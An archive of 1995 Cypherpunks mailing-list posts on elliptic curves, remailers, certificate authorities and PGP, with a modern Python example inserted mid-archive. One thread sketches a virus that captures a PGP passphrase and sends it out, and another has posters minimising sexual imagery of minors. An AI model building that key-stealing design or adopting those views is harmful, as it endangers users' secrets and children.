There is an operation that isn't too expensive for computing a_(i+j) given a_i and a_j. For some big integer i you can compute a_i in about (log i)^3 steps. For RSA, knowing how to do these two computations does not reveal what the period of the sequence is, i.e. what is the first i such that a_0 = a_i. Knowing the period is tantamount to knowing the private key. From jis at mit.edu Sat Nov 25 16:11:01 1995 From: jis at mit.edu (Jeffrey I. Schiller) Date: Sun, 26 Nov 1995 08:11:01 +0800 Subject: PGP Distribution Site at MIT *DOWN* Message-ID: The anonymous FTP server running on net-dist.mit.edu (which is also bitsy.mit.edu) is currently down due to a failure of the disk drive that hosts the files. We expect to replace the disk this afternoon (Saturday) and begin restoral operational as soon as the new disk is cabled up. We apologize for the inconvenience and hope to have full service restored shortly. -Jeff From jis at mit.edu Sat Nov 25 16:17:42 1995 From: jis at mit.edu (Jeffrey I. Schiller) Date: Sun, 26 Nov 1995 08:17:42 +0800 Subject: MIT Distribution Site (FTP) for PGP and Other Products *DOWN* Message-ID: In article , jis at mit.edu (Jeffrey I. Schiller) wrote: > The anonymous FTP server running on net-dist.mit.edu (which is also > bitsy.mit.edu) is currently down due to a failure of the disk drive > that hosts the files. We expect to replace the disk this afternoon > (Saturday) and begin restoral operational as soon as the new disk > is cabled up. Service is now restored (on a new disk). -Jeff From jimbell at pacifier.com Sat Nov 25 16:22:08 1995 From: jimbell at pacifier.com (jim bell) Date: Sun, 26 Nov 1995 08:22:08 +0800 Subject: Gingrich, "crypto coalition" & dysfunctional philosophy Message-ID: The detweiler tentacle is afraid to debate me... >To: "Vladimir Z. Nuri" >From: jimbell at pacifier.com (jim bell) >Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy > >>well, I don't really care about convincing anarchists that you're >>a bozo. it's reasonable people who it would scare me if they began >>to take you seriously. > >Then start being "scared." I guess you have lots of practice. > >> frankly I'm not convinced that anyone with >>half a brain is taking you seriously. > >I don't have to convince you of anything! You wimped out! You claimed that you would be happy to debate me IN PUBLIC! Well, I did and you ran away with your tail between your legs! > >Stop being a wuss! If you're as correct as you claim you are, you have no reason to fear. Debate, dammit! > From jya at pipeline.com Sat Nov 25 16:26:54 1995 From: jya at pipeline.com (John Young) Date: Sun, 26 Nov 1995 08:26:54 +0800 Subject: AI and Author-ID Security Message-ID: <199511260016.TAA27186@pipe4.nyc.pipeline.com> The AI and author-ID security programs covered in the Nov 17 Science article are described in detail at: Active Defense of a Computer System Using Autonomous Agents Mark Crosbie and E. H. Spafford; Department of Computer Sciences, Purdue University; CSD-TR-95-008; 1995. Defending a Computer System Using Autonomous Agents Mark Crosbie and E. H. Spafford; Department of Computer Sciences, Purdue University; CSD-TR-95-022; 1995. 
Authorship Analysis: Identifying the Author of a Program Ivan Krsul; Department of Computer Sciences, Purdue University; MS Thesis; CSD-TR-94-030; 1994. From adam at lighthouse.homeport.org Sat Nov 25 16:53:27 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sun, 26 Nov 1995 08:53:27 +0800 Subject: crypto for porno users In-Reply-To: Message-ID: <199511260041.TAA08908@homeport.org> Kids like Tracy Lords, who looked to be over 18 in all her movies? (All of which are now illegal to own because she was under 18 when she made them.) Adam "Clearly a sicko who should be locked up for his own good." Moroni wrote: | I'm sorry but I don't care if the images come from Mars. Jerking off | to the images of kids is sick. -- "It is seldom that liberty of any kind is lost all at once." -Hume From chen at intuit.com Sat Nov 25 18:26:44 1995 From: chen at intuit.com (Mark Chen) Date: Sun, 26 Nov 1995 10:26:44 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511252105.QAA08724@homeport.org> Message-ID: <9511260216.AA23306@doom.intuit.com> > | C) Don't settle for less than X.509 ver 3, because this allows the > | certificate to carry within it a reference to the location of the CRL > | list. Use that feature. > > Does X.509 version 3 fix the problem that Ross Anderson points > out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or > ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z) I don't believe that it does. For those who missed it, the problem is that the encryptor in an encrypt-before-signing protocol is able to use his knowledge of the factorization of the encryption modulus to compute a discrete log, and forge another message for which the signature is also valid (after registering the new exponent). 
- Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From norm at mediacity.com Sat Nov 25 21:58:57 1995 From: norm at mediacity.com (Norman Hardy) Date: Sun, 26 Nov 1995 13:58:57 +0800 Subject: Learning about Elliptic Curves Message-ID: I have found an easy introduction to elliptic curves. It is "Rational Points on Elliptic Curves" by Joseph H. Silverman & John Tate. (Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy undergraduate introduction. It emphasizes the mathematical elegance. 
It mentions crypto applications but does not delve deeply. Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J. Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has only a very compressed theory section which already requires knowledge of field theory. I think that the first book is a good intro to the second, which does cover crypto applications. What I learned is that elliptic curves are an alternative to finite fields for crypto purposes. Here is what they have in common: There are many (2^70 -- 2^2000) values any one of which can be represented in the machine in constant space. a_i is the ith one of these values. If someone sends you a_i it is real hard to figure out what i is. There is an operation that isn't too expensive for computing a_(i+j) given a_i and a_j. For some big integer i you can compute a_i in about (log i)^3 steps. For RSA, knowing how to do these two computations does not reveal what the period of the sequence is, i.e. what is the first i after 0 such that a_0 = a_i. Knowing the period is tantamount to knowing the private key. From EALLENSMITH at ocelot.Rutgers.EDU Sat Nov 25 22:24:00 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sun, 26 Nov 1995 14:24:00 +0800 Subject: crypto for porno users Message-ID: <01HY2X8H88VK8WYKBT@mbcl.rutgers.edu> From: IN%"moroni at scranton.com" "Moroni" 25-NOV-1995 16:21:44.10 I'm sorry but I don't care if the images come from Mars. Jerking off to the images of kids is sick. ---------------------------- That's your opinion, and thus your problem to be dealt with by you. Yes, I'm calling that a _problem_. If it makes you want to harm others who aren't harming anyone else, then it's a problem. I also have my doubts as to whether you can honestly deny ever being attracted by a young teenager, even as an adult. But your sexual preferences are not my business, any more than anyone else's are of yours. 
I will refrain from posting further on cypherpunks about this, since it's getting far from the purpose of the list. Feel free to reply in private email. -Allen From saken at chardos.connix.com Sat Nov 25 22:56:59 1995 From: saken at chardos.connix.com (Scott Kenney) Date: Sun, 26 Nov 1995 14:56:59 +0800 Subject: REPOST: Amnesia Remailer Message-ID: <199511260646.BAA06047@chardos.connix.com> -----BEGIN PGP SIGNED MESSAGE----- Excuse the repost but I was asked to do this again !MIME :) The amnesia remailer is now available for public use: amnesia is a combination mixmaster/type 1 remailer supporting the following capabilities: cpunk mix pgp hash latent cut ek ksub Encrypted: PGP - header ## - pasting Latency: - header Cutmarks: - header Encrypt-Key: - header Due to the nature of my mail connection there is an automatic variable latency of 0-180 minutes. The reordering pool is set to 5 presently. amnesia is currently running the following software: Lance Cottrell's Mixmaster v.2.0.3beta6 Lance Cottrell's Reordering package. John Fleming's Freedom Remailer v.1.00 (upgrading to 1.6beta soon) Hopefully USENET posting capability will be added soon. The remailer keys are attached. 
Scott Kenney =-=-=-=-=-=-=-=-=-=-=-= amnesia amnesia at chardos.connix.com e320fd79c4c229decabe4d486bd84394 2.0.2

From jpb at miamisci.org Sat Nov 25 23:21:39 1995 From: jpb at miamisci.org (Joe Block) Date: Sun, 26 Nov 1995 15:21:39 +0800 Subject: So. FL Cypherpunks Keysigning/Party Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Jim Ray (liberty at gate.net) announced a South Florida Cypherpunks meeting for the night of Wednesday, November 29th at the Abbey Brewing Company on South beach. >Location: >The Abbey Brewing Company (305) 538-8110 >1115 16th Street, Miami Beach > >Directions: >[From North: Take I-95 South to 195 exit, over to the beach, and go South >on Alton Road.
Look for a green sign that says "BAR" atop the building.] >[From South: Take I-95 North to 395 exit, over to the beach, and go North >on Alton Road. Look for a green sign that says "BAR" atop the building.] I am proposing that all cypherpunks planning on attending the meeting email me their PGP key fingerprint between now and noon on the 29th. I'll collate them and print enough copies of the fingerprint checklist for all who've announced that they're planning to attend. At the meeting, you can verify (or not, not my business, really) the fingerprints with the other attendees. Afterwards, we'll exchange keys via email and sign them at home and mail them back to their owners. I'll set up an email list so that each person can email out their key once they've merged all the signatures. Suggestions as to how to streamline this process are welcome. For more information on the meeting, contact Jim at liberty at gate.net Joe Block "We can't be so fixated on our desire to preserve the rights of ordinary Americans ..." -- Bill Clinton (USA TODAY, 11 March 1993, page 2A) signoff 2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74 ------------------------------------------------------------------------ Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf

From jamesd at echeque.com Sat Nov 25 23:43:48 1995 From: jamesd at echeque.com (James A.
Donald) Date: Sun, 26 Nov 1995 15:43:48 +0800 Subject: crypto for porno users Message-ID: <199511260734.XAA14199@blob.best.net> At 05:14 PM 11/25/95 -0500, Moroni wrote: > > I'm soory but I don't care if the images come from mars . Jerking off >to the images of kids is sick. An image of a sixteen year old girl masturbating is classified as child pornography in American law: Think about how old you were when you first engaged in sexual acts. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From ddt at lsd.com Sun Nov 26 00:46:58 1995 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 26 Nov 1995 16:46:58 +0800 Subject: [FYI] FBI Training Eastern European Police Message-ID: [ from: The Hungary Report #1.28, free weekly, direct from Budapest ] [ retransmitted to list without permission to increase distribution ] FBI School Teaches New Tricks to Old Enemies By Susan Milligan Copyright (c) 1995 In matching navy blue polo shirts, the students sat transfixed as they watched slides showing the destruction of the Oklahoma City and World Trade Center bombings. "God forbid you should ever have anything like this happen over here," American instructor Ed Burwitz told his Central European class, outfitted with headphones for simultaneous translation of the lecture. "It is a tough task for any freedom-loving country to prevent terrorism," he added. The class on forensics is typical of what goes on in law enforcement academies across America. But in this classroom, the instructors are teaching crime-fighting tactics to students from onetime enemy nations. "This could not have happened five years ago," said Laszlo Simon, the Hungarian director of the International Law Enforcement Academy here. 
"We don't preach or teach," said Leslie Kaciban, the American director of the newly-opened facility. Instead, the American instructors - culled from the FBI and other law enforcement agencies - share information and experiences with the students for them to adapt to their systems. Students from Hungary, Russia, Poland, the Czech Republic and other Central and Eastern European nations attend ILEA's 8-week sessions, the first of which began in April. The United States fronted $2.5 million to renovate the campus, which includes a brand-new gym, classrooms, dormitories and one of Hungary's few indoor tennis courts. The Hungarian government contributed $500,000 to renovate the facility, but the U.S. will pay the $3.5 million yearly cost to operate the center, which is modeled after the law enforcement training center in Quantico, Va. The facility looks like any other college campus - students go on field trips together, take "wellness" physical fitness class together, and will have a yearbook and alumni newsletter. The idea is to help the Eastern Europeans with their burgeoning crimes problems, as well as to foster cooperation on international crime problems. "I'm amazed at the freedom of travel that is possible" after the opening up of the Eastern nations, Burwitz said. But "that means criminals can travel as well," he said, allowing them to traffic drugs and contraband. "The more interaction we have with these countries in law enforcement, the better it will be for emerging democracies," Kaciban said. Class topics range from "human dignity" - how to treat a crime suspect - to undercover operations and fraud. April's bombing of the federal building in Oklahoma City is being used as an example in several classes. In "crisis management," students will learn "how to contain it (a crisis) and keep it from erupting," said instructor Stephen Brooks, who helped handle the Oklahoma City bombing. Big-scale bombings are not common to this part of the world, students said. 
But they said they learned a lot about how to fight organized crime, which is mushrooming in the aftermath of the fall of communism. "They told they have a lot of problems (with organized crime), and that it's better if we learn from their mistakes," said Hungarian student Vilmos Szeplaki. Organized crime is doubly damaging to the emerging nations, because it undermines their economies, Kaciban said. Investors are naturally reluctant to dump money into a nation if they believe there is rampant corruption. Some teachings do not translate for the European students. For example, there is no Russian RICO - the Racketeer Influenced and Corrupt Organizations Act that is one of the strongest American legal tools against organized crime. Eastern European crime syndicates tend not to be based in crime families, instructors said. And organized crime in Russia and Ukraine is so much a part of the society, that it's hard to stop it, said Amy O'Neil, a State Department official not involved in the ILEA. "Under the communist system, you basically did what you could get away with. Everyone broke laws," O'Neil said. "That's how you survived." Both students and teachers said there was a remarkable similarity, however, in the use of evidence and investigatory tools among the countries. Eastern Europeans are very familiar with the use of DNA testing, for example, to identify suspects, although they don't always have the money to do it, Burwitz said. "There are different orders of laws between the U.S. and here," said a Czech student who would identify himself only as Milan. "But essentially, we have the same methods of investigation." * * * Susan Milligan is a free-lance writer and stringer for the Boston Globe, the San Francisco Examiner, Business Central Europe and Hollywood Reporter.
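Norman Hardy's "Learning about Elliptic Curves" message earlier in this archive describes a sequence a_i with a cheap operation giving a_(i+j) from a_i and a_j, a fast way to reach a_i for large i, and a period. The sketch below is an added example, not code from any poster on the list: it runs one double-and-add routine over both the integers mod p and a toy elliptic curve. The prime 97, the curve y^2 = x^3 + 2x + 3 and the base values 5 and (3, 6) are constructed for illustration and far too small for real use.

```python
"""Hardy's sequence a_i in two groups: integers mod p and a toy elliptic curve.

All parameters are constructed for illustration (assumptions, not from the list).
"""

P_MOD = 97     # small prime field
A, B = 2, 3    # curve: y^2 = x^3 + A*x + B over F_97
G = (3, 6)     # base point a_1: 6^2 = 36 = 27 + 6 + 3 (mod 97)
INF = None     # point at infinity, the identity a_0 on the curve


def on_curve(pt):
    """True if pt satisfies the curve equation (the identity counts as on it)."""
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P_MOD == 0


def ec_add(p1, p2):
    """Curve group law: the operation that yields a_(i+j) from a_i and a_j."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF                                   # P + (-P) = identity
    if p1 == p2:                                     # tangent slope (doubling)
        slope = (3 * x1 * x1 + A) * pow((2 * y1) % P_MOD, -1, P_MOD)
    else:                                            # chord slope (addition)
        slope = (y2 - y1) * pow((x2 - x1) % P_MOD, -1, P_MOD)
    slope %= P_MOD
    x3 = (slope * slope - x1 - x2) % P_MOD
    y3 = (slope * (x1 - x3) - y1) % P_MOD
    return (x3, y3)


def mul_mod(a, b):
    """Group law for the integers mod p: here a_i = g^i mod p."""
    return (a * b) % P_MOD


def nth(i, base, op, identity):
    """Return (a_i, group_ops) by double-and-add (square-and-multiply).

    Uses at most 2*log2(i) group operations; each operation is itself
    arithmetic on numbers the size of the modulus, so the bit-level cost
    grows faster than the operation count shown here.
    """
    result, addend, ops = identity, base, 0
    while i > 0:
        if i & 1:
            result = op(result, addend)
            ops += 1
        i >>= 1
        if i:
            addend = op(addend, addend)
            ops += 1
    return result, ops


def period(base, op, identity):
    """First i > 0 with a_i == a_0, found by walking the whole sequence.

    This linear walk is only feasible because the toy group is tiny.
    """
    i, cur = 1, base
    while cur != identity:
        cur = op(cur, base)
        i += 1
    return i


if __name__ == "__main__":
    for name, base, op, ident in (("mod 97", 5, mul_mod, 1),
                                  ("curve", G, ec_add, INF)):
        n = period(base, op, ident)
        value, ops = nth(1_000_003, base, op, ident)
        print(f"{name}: period {n}, a_1000003 = {value} in {ops} group ops")
```
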
From anonymous-remailer at shell.portal.com Sun Nov 26 01:51:31 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 26 Nov 1995 17:51:31 +0800 Subject: Cypherpunk Certification Authority Message-ID: <199511260942.BAA09733@jobe.shell.portal.com>

On Sat, 25 Nov 1995, Aleph One wrote: > On Sat, 25 Nov 1995, Perry E. Metzger wrote: > > > Hmmm. If someone is willing to find out what is needed to become a > > C.A. and to run one, and it turns out not to be particularly onerous, > > I or one of my corporate alter egos might be willing. I must say, > > though, that being an anti-fan of X.509 the situation would be ironic... > > > > Perry > > Well from Netscape perspective as far as I know you need nothing. Basically > when the browser finds a new CA that it does know about it prompts > the user and through a series of dialog boxes the user chooses to trust > it or not. Gee, wasn't that clever of Netscape?? Lilies that fester smell worse than weeds ... people should remember that. (I think Shakespeare first wrote that in one of his sonnets ...) > (Well that is theory, and what netscape release notes say, since > I don't have access to an SSL server right now, and would need to figure > out how to make my own certificate, I haven't tried it). Bingo. *theory* ... right ... I mean what would be the point?? Installing Netscape degrades your inherent system security. No ifs, ands, or buts. Netscape Navigator basically destroys whatever sense of privacy or security, any person ever had the illusion of having. And that pretty well rules out CA. Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E.
From anonymous-remailer at shell.portal.com Sun Nov 26 02:00:44 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 26 Nov 1995 18:00:44 +0800 Subject: Cypherpunk Certification Authority Message-ID: <199511260953.BAA10105@jobe.shell.portal.com> On Sat, 25 Nov 1995, Adam Shostack wrote: > Does X.509 version 3 fix the problem that Ross Anderson points > out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or > ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z) > > Its an excellent paper, well worth reading, but the basic > problem is that X.509 encrypts before signing. You'd rather sign before encryption?? Doesn't that give you "known plain-text" to attack? i.e. the signature. I'm not sure whether it would or wouldn't, but I'm sure some cryptographers here might clear that up mighty quick -- before any more harm is allowed, I mean. > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jya at pipeline.com Sun Nov 26 07:19:21 1995 From: jya at pipeline.com (John Young) Date: Sun, 26 Nov 1995 23:19:21 +0800 Subject: BOS_nya Message-ID: <199511261508.KAA17650@pipe4.nyc.pipeline.com> 11-26-95. Washrag: "Seeking the Government That Governs Best." Book review. What Comes Next: The End of Big Government And the New Paradigm Ahead By James P. Pinkerton Hyperion. 404 pp. $24.95 In Pinkerton's account, bureaucracy survives today only because no one has yet developed a coherent replacement model." Instead we have deluded ourselves into thinking that periodic upgrading of what Pinkerton calls the "Bureaucratic Operating System" (BOS) -- in the same way that computer software is upgraded -- will enable us to avoid the gloomy prospect of life in the "Cyber Future," his term for the horrific predicament of extreme inequality and hypercrime to which we are headed. 
At one point Pinkerton suggests that a parallel for Bill Clinton may be found in Mikhail Gorbachev. Both leaders "shrank from genuine perestroika" after their peoples had come to the realization that the system itself was the problem. Displaying a sure grasp of popular culture, technology and political history, Pinkerton writes engagingly and insightfully about the defects and malfunctionings of the American bureaucratic state. His refreshing analyses of the flaws in bureaucratic thinking are among the best that we have on the subject and, surely, the wittiest. BOS_nya (7 kb) From mark at unicorn.com Sun Nov 26 07:52:52 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Sun, 26 Nov 1995 23:52:52 +0800 Subject: [NOISE] Re: crypto for porno users Message-ID: On Fri, 24 Nov 1995, E. ALLEN SMITH wrote: > consent. For instance, Britain's age for consent depends on the > type of sexuality involved; heterosexual sex receives a more > lenient age (18) than homosexual (21). This is getting distinctly off-topic, but Britain's age of consent is actually 16 for heterosexual sex, 18 for male homosexuals (unless the government have changed it back again, they reduced it from 21 a few months ago), and I think 16 for lesbians. But it's all terribly complicated, as you pointed out... Incidentally, the "Sun" newspaper, one of the most popular in the UK (sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed half-page erotic pictures of topless sixteen-year-old girls. Would this be "kiddie porn" in the US ? OBCrypto: Did anyone ever find out which version of A5 is in Applied Cryptography ? 
Mark From jhupp at novellnet.gensys.com Sun Nov 26 08:54:14 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Mon, 27 Nov 1995 00:54:14 +0800 Subject: Cypherpunk Certification Authority Message-ID: <20439E87AE1@Novellnet.Gensys.com> On 25 Nov 95 at 15:35, Alex Strasheim wrote: : > Basicly when the browser finds a new CA that it does know about it promts : > the user and through a series of dialog boxes the user chooses to trust it : > or not. : : Is anyone running an ssl web server that would let us see how this works? : : A 'how to' on rolling your own can be found at: http://fiasco.snre.umich.edu/~altitude/ssl/ssl.saga.html While that one is using a certificate from VaraSign, as mentioned earlier you can create your own authority and certificate with tools you find at: http://bond.edu.au/External/Misc/Crypto/ -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com The difference between science and the fuzzy subjects is that science requires reasoning, while those other subjects merely require scholarship From khijol!erc at uunet.uu.net Sun Nov 26 10:09:00 1995 From: khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin]) Date: Mon, 27 Nov 1995 02:09:00 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511260942.BAA09733@jobe.shell.portal.com> Message-ID: <199511261854.MAA08675@khijol> -----BEGIN PGP SIGNED MESSAGE----- > > (Well that is theory, and what netscape release notes say, since > > I dont have access to an SSL server right now, and would need to figure > > out how to make my own certificate, I havent tried it). > > Bingo. *theory* ... right ... I mean what would be the point?? > > Installing Netscape degrades your inherent system security. No ifs, > ands, or buts. > > Netscape Navigator basically destroys whatever sense of privacy or > security, any person ever had the illusion of having. And that pretty > well rules out CA. > > Alice de 'nonymous ... > > ...just another one of those... 
> ...hunters... > > P.S. This post is in the public domain. > C. S. U. M. O. C. L. U. N. E. Is this another one of those LD tentacles? ;) - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory.

From jamesd at echeque.com Sun Nov 26 11:30:01 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 27 Nov 1995 03:30:01 +0800 Subject: Cypherpunk Certification Authority Message-ID: <199511261922.LAA16753@blob.best.net>

At 01:53 AM 11/26/95 -0800, anonymous-remailer at shell.portal.com wrote: >You'd rather sign before encryption?? > >Doesn't that give you "known plain-text" to attack? The signature is not known unless the whole message being signed is known. And any encryption scheme that is vulnerable to known plaintext attack where only a part of the message is known, is worthless anyway. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com

From zerucha at shell.portal.com Sun Nov 26 11:54:03 1995 From: zerucha at shell.portal.com (Thomas E Zerucha) Date: Mon, 27 Nov 1995 03:54:03 +0800 Subject: Virus attacks on PGP In-Reply-To: Message-ID:

On Fri, 24 Nov 1995, Norman Hardy wrote: > At 2:46 PM 11/24/95, Thomas E Zerucha wrote: > ....
> > >It takes quite an effort to create a complex virus to do this. It > >reminds me of the Glomar Challenger that was used to recover the remains > >of a Russian sub (my memory is somewhat faulty). Such a virus would > >require a great investment in time and money. What target would be worth it? > >Many otherwise feasible things aren't economically practical. > > Yes, but if your particular habits became widespread, an intelligence > agency could amortize the virus effort across many victims. > > Here is just one such complicated virus: > Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The > patch writes to disk the location and password for the secure key ring. > Concurrently the virus watches for there to be IP service and sends the > disk information as a UDP. The virus is starting to get large and noticeable. First, I alternate between a.out and ELF (and DOS .EXE). It doesn't have to patch pgp, just look for it to be loaded and the secring file accessed. Then record keystrokes. This would also work with a hardware implementation if the secring passphrase is external (as opposed to an external keypad). This is what can be done when PGP is used for communication. For other info, I can isolate a computer (no modem, unroutable IP addresses, etc). Of course our firewall is a socks server and doesn't forward UDP. Maybe a socksified, SSL virus? My computer is attached that way far more than via modem. And maybe I should just nuke (or modularize) UDP? You can do interesting things with kernel source. > Alternatively the virus waits for idle time, (screen saver time) and dials > an 800 number having turned off the modem speaker. But don't send the same > data twice! That would be interesting - even with the speaker "off" the power surge causes clicking and other signs. Not to mention that the interrupt count would start moving (of course the virus could replace the entire OS and would only have to find 300K chunks to hide in).
Were they that interested, they could place a surveillence device over my desk (I don't know if they can pick up the scan on LCDs like they can on monitors - I am suprised they didn't put the kybosh to the FCC emission rules). Maybe I can move my desk, or my pgp station inside our EMI testing faraday cage :). zerucha at shell.portal.com -or- 2015509 on MCI Mail finger zerucha at jobe.portal.com for PGP key From jamesd at echeque.com Sun Nov 26 12:09:56 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 27 Nov 1995 04:09:56 +0800 Subject: [NOISE] Re: crypto for porno users Message-ID: <199511262001.MAA19515@blob.best.net> At 03:42 PM 11/26/95 +0000, Rev. Mark Grant wrote: > Incidentally, the "Sun" newspaper, one of the most popular in the UK > (sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed > half-page erotic pictures of topless sixteen-year-old girls. Would this be > "kiddie porn" in the US ? Yes --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Sun Nov 26 12:17:09 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 27 Nov 1995 04:17:09 +0800 Subject: Elliptic curves, current status? Message-ID: <199511262008.MAA20100@blob.best.net> I have read: That public key cryptography using elliptic curves is much faster than using integers, for comparable security. That public key cryptography using elliptic curves is much slower than using integers, for comparable security. That the numbers required have many more bits. That the numbers required have somewhat less bits. That elliptic curves are about the same, but the programs are a lot nastier. Can someone tell me the true story? 
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com

From doug at Eng.Auburn.EDU Sun Nov 26 12:26:59 1995 From: doug at Eng.Auburn.EDU (Doug Hughes) Date: Mon, 27 Nov 1995 04:26:59 +0800 Subject: Virus attacks on PGP In-Reply-To: Message-ID:

On Fri, 24 Nov 1995, Mark M. wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > On Fri, 24 Nov 1995, Moroni wrote: > > > > > Where can one get PGP burnt into cdrom? Or the equipment to do it > > Thanks in advance > > moroni > > > > > > > > I remember seeing in computer catalog a device that can burn data into a > cdrom and it even supplies blank cd's. Unfortunately, I cannot remember > the name of the catalog. It might have been _Tiger Software_ or some > similar catalog. I do know that the technology is available. > > There was a recent review in network computing of about 60 or so different CDROM recording devices. The cheapest one was about $500 from Liberty. The most expensive was I think the one from Kodak, for about $20k. The capabilities of each are different. Some include buffering, some don't. However, the pre-mastering software used to make file systems on a CDROM (HSFS, UFS, DOS, ISO-???? (forget that four digit number) is sold separately, but generally not too expensive. There are also single and multi-session CD 'burners'. The single session means you have to do the entire disk in one session, and generally if you mess up, you need a new disk. The multi- session devices let you start a session, and pick it up with more information at a later time. Most of them are designed for multi-media or audio recording, but you can generally get pre-mastering software that will work with something like CD-XA.. etc..
Check your software for compatibility before purchasing the hardware. ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Pro is to Con as progress is to congress From root at deimos.toad.com Sun Nov 26 12:30:59 1995 From: root at deimos.toad.com (Tom Zerucha) Date: Mon, 27 Nov 1995 04:30:59 +0800 Subject: Cyberpunk handbook In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com> Message-ID: The worst part of the book was the cover. I didn't think I was a cyberpunk until I could check off 8 out of 10 items (I don't have a pager or fake security ID, but I do have a carbide scribe and library with similar books in similar stacks:). To say nothing about fashion. I am no longer in denial ;). zerucha at shell.portal.com -or- 2015509 on MCI Mail finger zerucha at jobe.portal.com for PGP key From rah at shipwright.com Sun Nov 26 12:44:34 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 27 Nov 1995 04:44:34 +0800 Subject: BOS_nya Message-ID: > What Comes Next: > The End of Big Government And the New Paradigm Ahead > By James P. Pinkerton > Hyperion. 404 pp. $24.95 I read a review of this book in the Standard with in the last week or so. If you think *I'm* hyperjargonate, you should see how this guy does it. Hear tell he practically invents his own language... May be worth a read if the local library has it, though. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." 
--Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From rah at shipwright.com Sun Nov 26 12:46:34 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 27 Nov 1995 04:46:34 +0800 Subject: Cypherpunk Certification Authority Message-ID:

>Is this another one of those LD tentacles? ;) Must that or a spoof of some kind... "She" didn't sign it, and "she" claims to have issued a signature... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From rah at shipwright.com Sun Nov 26 12:47:10 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 27 Nov 1995 04:47:10 +0800 Subject: Electronic Commerce CFP for Special Issue in _The Information Society_ Message-ID:

--- begin forwarded text Dear Colleague: You may be interested in submitting a manuscript for review for the following special issue on Electronic Commerce. Rolf Wigand * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * CALL FOR PAPERS For a Special Issue on 'Electronic Commerce' The Information Society (An International Journal) -------------------------------------------------- _The Information Society (TIS)_ journal is inviting authors to submit papers for review on the topic of 'Electronic Commerce' for a special issue to be edited by Rolf Wigand, Syracuse University. The paper submission deadline is January 15, 1996. Electronic transactions are now common place in the business and government environment in the industrialized world.
